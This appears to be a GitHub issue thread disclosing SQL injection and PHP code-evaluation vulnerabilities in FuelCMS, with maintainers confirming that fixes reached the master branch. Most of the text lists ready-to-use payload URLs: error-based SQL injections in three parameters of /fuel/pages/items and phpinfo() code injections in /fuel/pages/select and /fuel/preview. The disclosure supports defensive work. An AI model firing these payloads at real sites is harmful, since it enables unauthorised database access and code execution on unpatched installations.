Vulnerability - Code Evaluations & SQL Injections #478
Comments
Great finds @om3rcitak! Shouldn't there be a new bug fix version of FuelCMS after discoveries like this though, @daylightstudio? It feels that code is kept in

@martynassateika you are right. There are essentially 2 develop branches going right now that I'd like to merge (develop and feature/php_7.2_compatibility). We currently have a lot of sites on 7.1 still and so the 7.2 vetting has been a little slower but is probably ready.

@daylightstudio

These updates have been applied to the master branch already.

Thanks for confirming!
Vulnerability - Code Evaluations & SQL Injections
Environment
Vulnerability Tree
1.1. /fuel/pages/items (GET = search_term)
1.2. /fuel/pages/items (GET = layout)
1.3. /fuel/pages/items (GET = published)
2.1. /fuel/pages/select/ (GET = filter)
2.2. /fuel/preview (POST = data)
1.1. SQL Injection in /fuel/pages/items (GET = search_term)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: search_term
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
1.2. SQL Injection in /fuel/pages/items (GET = layout)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: layout
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
1.3. SQL Injection in /fuel/pages/items (GET = published)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&limit=50
Parameter Name: published
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
2.1. Code Evaluation in /fuel/pages/select/ (GET = filter)
URL: http://{domain}/{fuelcms_path}/fuel/pages/select/?nocache=1507880376191&input=&target=&title=&class=&pdfs=&filter=%27%2b phpinfo() %2b%27
Parameter Name: filter
Parameter Type: GET
Attack Pattern: %27%2b phpinfo() %2b%27
2.2. Code Evaluation in /fuel/preview (POST = data)
URL: http://{domain}/{fuelcms_path}/fuel/preview?module=pages&field=vars--body
Parameter Name: data
Parameter Type: POST
Attack Pattern: %27%2b phpinfo() %2b%27